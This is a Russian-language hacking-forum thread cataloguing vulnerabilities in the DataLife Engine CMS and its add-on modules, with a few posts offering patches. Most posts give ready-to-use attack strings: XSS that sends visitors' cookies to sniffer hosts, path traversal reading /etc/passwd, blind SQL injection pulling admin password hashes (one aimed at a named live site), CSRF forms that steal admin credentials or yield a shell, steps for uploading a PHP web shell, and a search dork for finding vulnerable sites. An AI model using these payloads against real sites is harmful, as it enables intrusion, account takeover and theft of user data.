![]() |
[ Обзор уязвимостей DataLife Engine ]
Обзор уязвимостей [DataLife Engine] Сайт производителя: www.dle-news.ru Актуальная версия: 6.3 DataLife Engine v.3.7 [Раскрытие установочного пути] В parse.class.php выделено 12582912 байт на проверку сообщения. Переполнение делается так: "<<><><><><><>>" [ХСС] Угнать кукисы можно при помощи вставки картинки. [img][/img] -- этим можно воспользваться всегда, даже если нету таких кнопок при добавлении новости, личном сообщении, добавления коментария. Непосредственно сама ХСС: Код:
[IMG=left]http://anyimage.com/ok.gif" onmouseover='document.location=" class="fixed">http://your.sniffer.com/sniff/sniff.gif?id="+document.Код:
http://target.net/category/topic/ -- где topic -- это не существующая тема. Версия 4.1 возможно более ранние SQL Injection. Описание: Уязвимость позволяет удаленному пользователю выполнить произвольные SQL команды в базе данных приложения. Уязвимость существует из-за недостаточной обработки входных данных в параметре "user" в сценарии index.php. Удаленный пользователь может с помощью специально сформированного запроса выполнить произвольные SQL команды в базе данных приложения. Пример: [CODE]http://[host]/index.php?subaction=userinfo&user= DataLife Engine <= 4.1 Remote SQL Injection Exploit (perl) DataLife Engine <= 4.1 Remote SQL Injection Exploit (php) SQL injection for <=4.1 version exploit RGdatalife - exploit (php version) |
в виду наличия множества ресурсов в сети под этим движком решил поискать хоть какие-то уязвимости в нем..
пошел на офф сайт http://dle - news.ru/. SoftNews Media Group любезно предоставляет демо доступ для просмотра движка в роботе http://demo.dle - news.ru/ тут и начнем. Так, как это все на их сервере и это демо версия, то почти весь функционал они обрезали оставив только чтение =\. смотрим... баг в функциях оптимизации базы http://demo.dle-news.ru/admin.php?mod=dboption&action=dboption пакеты браузера Цитата:
и ошибка при не корректном посте данных /*пишет не корректное название таблицы*/ Цитата:
method=post auction=http://demo.dle-news.ru/admin.php?mod=dboption&action=dboption ta%5B%5D=dle_email,"><script>alert()</script>&whattodo=optimize или ta%5B%5D=dle_files"><script>alert(/xss/)</script>&whattodo=repair вообщем имеем пост ксс и расскрытие пути з.ы. сначала незаметил и создал новую тему ^^ |
DataLife engine...(версию уязвимую так и не выяснил... т.к. багу сам нашел, но точно знаю что до пятой... на 4.2 прокатывает)
Листилка (читалка) файлов там где не стоит мэйджик квотез: Код:
http://site.dmn/engine/ajax/vote.php?vote_action=results&vote_skin=../../../../../../../../../../../etc/passwd%00(c) Scipio |
Раскрытие полного установочного пути (для авторизированых юзеров)
Код:
index.php?do=pm&doaction=newpm&user[]=Код:
Warning: urldecode() expects parameter 1 to be string, array given in %путь_установки%/engine/init.php on line 49 |
blind sql-inj в неофициальном модуле к Dle files (файловый архив)
уязвимость после order by в параметре orderby Пример запроса: Код:
http://www.alldown.ru/index.php?do=files&op=cat&id=1&orderby=if(ord(substring((select+password+from+dle_users+where+user_group=1+limit+0,1),1,1))+between+0+and+0,url,(select%201%20from%20dle_downloads))+--+PHP код:
|
Нашёл XSS в модуле DLE Forum 2.1
Код:
http://site/dle-forum.php?status_report=<script>alert(/XSS/)</script>З.Ы. Гуглом ищутся по запросу: intitle:"Работает на DLE Forum" |
Ещё забавную багу нашёл в модуле DLE Forum 2.1
:) Возможность отправки сообщений от имени произвольного пользователя (можно несуществующего): Создайте страничку со следующим кодом: Код:
<form method="POST" action="http://site/?do=forum&act=post&code=reply&code=01"> |
Blind SQL Injection в в модуле DLE Forum 2.1:
На самом деле там две инъекции, в 2х запросах выполняющихся подряд, т.е. одна из ошибок бкдет отображаться в любом случае. Для выполнения, нужно залогиниться. Для начала нужно добавить иньекцию в БД Примеры: Код:
http://site/?do=forum&act=subscription&code=add&tid=-1 UNION SELECT 1,BENCHMARK(100000,md5(current_time)),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19 --Код:
http://site/index.php?do=forum&act=subscription&code=add&tid=-1 OR tid=(SELECT 1 UNION SELECT 2) --Код:
http://site/index.php?do=forum&act=subscriptionКод:
http://test2.ru/?do=forum&act=subscription&code=del&tid=[SQL]З.Ы. Сорри, что не добил скуль до конца, времени не хватает, но это возможно. |
SQL Injection в в модуле DLE mChat v. 2.0:
Нашёл в админке, и после ORDER BY, наверное бесполезная, но: Код:
http://site/admin.php?mod=mchat&start_from=SQLКод:
http://site/admin.php?mod=mchat&mchat_per_page=1SQL |
Раскрытие пути в модуле DLE mChat v. 2.0:
Код:
http://site/admin.php?mod=mchat&action=mess_delКод:
http://site/admin.php?mod=mchat&action=do_mess_del |
Активная, но очень неудобная XSS в модуле DLE mChat v. 2.0:
При отправке сообщения, вида: Код:
<a href="http://www.ya.ru">А исправь ка</a>З.Ы. <script>, document.cookie - фильтрует, "javascript:" превращает в javascript:<b></b> и иногда в неудачных местах ставит <br />. В общем окне просмотра чата, теги видны прекрасно. |
Раскрытие пути в DataLife Engine v.6.7:
Код:
http://site/engine/inc/init.phpКод:
http://site/dle-forum.phpКод:
http://site/engine/ajax/mchat.refresh.phpНашёл после того, как написал тулзу для поиска раскрытий пути и простейших SQL ошибок :) З.Ы. Если кому надо - обращайтесь (написал на Java). |
Вот ещё нашёл в модуле DLE Forum 2.1:
Уничтожить некоторые таблицы форума и узнать префикс к таблицам в БД, можно так: Удалил т.к. то, что побочно уничтожается БД, заметил после публикации уязвимости, думаю неэтично такое выкладывать в паблик.. Уязвимость присутствует, если забыли удалить файл dle-forum.php. В дикой природе встречается ~ в 20-30% случаев. Безопасно посмотреть префикс к таблицам БД можно так: Код:
http://site/dle-forum.php?action=upgrade |
То же самое и в модуле DLE mChat v. 2.0, есть возможность удалить все записи в чате (в том числе логи чата), если забыли удалить папку /mcinstall/ после установки.
В принципе, для чата это не так деструктивно, а вот уничтожить следы деятельности поможет, так что выкладываю: Код:
http://site/mcinstall/?action=doinstall |
DataLife Engine 6.7 vulnerability or higher
1. Бага заключается в следующем.
Смотрим сорс страницы пользователя PHP код:
PHP код:
Код HTML:
var dle_admin = 'admin.php'; // скрипт адмиского входа.Накатали скрипт, респект zarin за помощь, который подгружает страницу с серва и сохраняет ее на хосте. Нужно только одно условие чтобы оно сработало, это чтобы админ был залогинен на сайте. PHP код:
2. Ну и так для развлечения ксс PHP код:
|
DLE 6.3
Раскрытие пути: Код:
index.php?catalog[]= |
DataLifeEngine Online Mod Exploit Blind SQL Injection
DLE Online Mod Exploit Blind SQL Injection
Нашел багу я, а эксплойт написал Евгений Минаев Сохраняем эксплойт и закидываем его к себе на локалхост, от туда запускаем. Выдерает хеши любого юзера, шифрация md5(md5($pass)) PHP код:
|
Datalife Engine 6.7 XSRF
Datalife Engine 6.7 XSRF _http://securityvulns.ru/Tdocument552.html Exploit: http://site.com/datalife-path/engine/modules/imagepreview.php?image=[XSRF] Подробно рассмотрено: _https://forum.antichat.ru/thread67881.html |
Заливка шелла через админку Datalife Engine
Версию точно определить не смог, но в сорцах написано про 2008 год. Итак, заходим в админцентр. Далее нажимаем "Другие разделы" Выбираем где-то в конце "Архив файлов" Идём на "Настройка Архива Файлов" Допустимые форматы файлов: дописываем php. Сохраняемся, идём в "Добавить файл". Заливаем шелл :) Его дальше видно в разделе "Файловый Архив" для всех и в свойствах загруженного файла в редактировании файлов в админке. Нашёл сегодня сам, так как очень приспичело, а старые баги не подходили. Если уже где-то было, извините.. Потом, может, сниму видео... |
Цитата:
Там можно вставлять php код в текущий шаблон ИЛИ есть кнопочка [создать новый]. Через нее можно тупо создать шелл. А потом в своих настройках отображения сайта выбрать вновь созданную тему. Вообщем как-то так. Экспериментируйте. |
Цитата:
надо: В файле index.php, заменить PHP код:
PHP код:
(с) dle-news.ru так что облом --------------------------------------------- загружать шелл через добавление новости тоже не получается. 1) не отображается полный путь файлы\а(шелла) т.к при загрузке скрипт сам дописывает цыфры перед файлом. 2) в папке uploads/files (куда складываются файлы) лежит .htaccess в котором: PHP код:
|
Datalife Engine XSRF пытались залатать...... :rolleyes:
Цитата:
вместо javascript пишем Javascript вместо document.cookie пишем Document.cookie ;) |
Datalife ветки 6.x
Весьма интересные вещи творятся когда пользователь повторно заходит в систему под своим аккаунтом (имеется ввиду проходит аутентификацию по кукисам). Запрос браузера:
Код:
GET http://www.site.net/ HTTP/1.0P.S. Т.к. MySQL error показывает неудачные запросы, есть возможность XSS атаки, однако чужие кукисы "угнать" не получится. |
Недостаточная фильтрация входящих данных
/engine/modules/functions.php Подробно рассмотрено: http://4dle.ru/bugs/1147156035-nedos...iltracija.html |
Нашёл XSS в Datalife Engine v 6.7 (в остальных версиях не проверял, по инету потыкался, везде где доступна админка, вроде работает):
В файле: http://site/admin.php Код:
Cookie: dle_lastusername='><script>alert(/XSS/)</script> |
Dle forum 2.1 (возможно, последующие версии, не проверял)
Эксплойт, получение логина, хеша, мыла админа: Код:
<form action="http://evil.com/?do=forum&act=category" method="post"> Dle <=6.7 (возможно, последующие версии, не проверял) Эксплойт, дающий шелл (использовать залогиненным админом) : Код:
<form action="http://evil.com/admin.php?mod=options&action=syscon" method="post">Код HTML:
http://evil.com/adm.php?mod=options&action=syscon&lala=phpcode();ЗЫ хеш зашифрован md5(md5()). Такого вида хеши успешно расшифровываются большинством онлайн-сервисов Я кончил. |
Недостаточная фильтрация входящих данных
/engine/classes/parse.class.php Подробно рассмотрено: http://dle-news.ru/bags/v73/439-nedo...h-dannykh.html |
Blind slq-inj в модуле галерея для dle, в параметре news_sort
Уязв.код (news_sort) : show_cat.php PHP код:
Пример запроса: Код:
POST /index.php?do=gallery&action=show_cat&category=gorod HTTP/1.1PHP код:
|
Цитата:
Достаточно добавить несколько строчек ,и вместо странички с этими ненужными данными будет красоваться "Hacking attemp" Код:
if ($_REQUEST['vote_skin']) { |
свеженькая XSS для DLE <= 7.2 от Hadi Kiamarsi
Код:
http://victim-site.com/admin.php/%3E%22%3E%3CScRiPt%3Ealert('Hadi-Kiamarsi')%3C/ScRiPt%3EКод:
http://victim-site.com/admin.php/%3E%22%3E%3CScRiPt%3Evar Xcook=document.cookie;document.images[0].src='http://evil-site.com%3F'+Xcook%3C/ScRiPt%3E |
Цитата:
тут палить нулленый движки :D |
Расскрыите путей:
Код:
http://site.ru/index.php?do=register&doaction=validating&step=2&id[]=1 |
раскрытие путей
Цитата:
Цитата:
Цитата:
для тех у кого есть доступ в админку(журналисты, модераторы и выше) Цитата:
ps http://dle-news.ru/bags/v75/570-nedostatochnaya-filtraciya-vxodyashhix-dannyx.html кандоны( уже патч выпустили( |
Модули DLE
Youtube Video Downloader
Версия: 1.0 Пассивная-XSS :( Собственно Уязвимый скрипт: youtubedownloader.php Запрос: http://www.youtube.com/watch?v=Gw0Ysp47hl8"><h1>simple</h1> Метод: POST Уязвимый кусок кода: PHP код:
|
SPAM BUTTON in PM
Версия: v.1.0 Раскрытие путей Уязвимый скрипт: engine\inc\pmspam.php Запрос: -- Метод: -- Уязвимый кусок кода: PHP код:
|
SPAM BUTTON in PM
Версия: v.1.0 ВОЗМОЖНО Sql-INJ Уязвимый скрипт: engine\inc\pmspam.php Запрос: flag=-1' Метод: POST Уязвимый кусок кода: PHP код:
|
DLE HACK SERVICE BETA
Версия: v.1.0 Расскрытие путей Уязвимый скрипт: engine\inc\md5.php Запрос: pass[]=md5 Метод: POST Уязвимый кусок кода: PHP код:
|
Простой мини чат для Dle
Версия: v.1.0 Расскрытие путей Уязвимый скрипт: shout.php Запрос: name[]=1&message[]=msg Метод: POST Уязвимый кусок кода: PHP код:
|
Простой мини чат для Dle
Версия: v.1.0 Активная XSS Уязвимый скрипт: shout.php Запрос: name=<h1> 1 </h1>&message=<h1> xsss </h1> Метод: POST Уязвимый кусок кода: PHP код:
|
profileZ. Смена логина
Версия: v.1.5 Sql-INJ Уязвимый скрипт: engine/modules/profile.php Запрос: usertitle=-1' Метод: POST Уязвимый кусок кода: PHP код:
|
| Время: 06:18 |